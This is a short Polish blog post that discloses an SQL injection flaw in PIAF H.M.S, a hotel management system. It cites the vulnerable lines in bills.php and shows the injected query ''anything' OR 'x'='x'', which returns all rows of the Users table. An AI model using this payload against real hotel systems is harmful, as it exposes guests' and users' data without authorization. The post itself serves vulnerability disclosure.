niedziela, 28 października 2012

Hack VoIP #3 - PIAF H.M.S - SQL Injection

Kolejny system VoIP wzięty pod lupę i po 5 minutach kilka znalezionych błędów. Poniżej publikuję tylko jeden SQL Injection. Resztę znajdziecie sami :)


System ten można spotkać głównie w hotelach.

PIAF H.M.S
Hospitality Management System
Źródła: http://code.google.com/p/piafhms/


file: bills.php
line: 86-87

        $query = $query . " ORDER BY ID DESC";
        printf($query); 

query:
SELECT * FROM `Users` WHERE `Room` = 'anything' OR 'x'='x' ORDER BY ID DESC
Autor: o
Etykiety: ,

Brak komentarzy:

Prześlij komentarz

Proszę zostaw swój komentarz w celu dopowiedzenia tego czego ja nie wiedziałem lub wywołania ciekawej dyskusji. Wprowadziłem moderowanie komentarzy ze względu na dużą popularność bloga wśród różnych SEO botów :)

Subskrybuj: Komentarze do posta (Atom)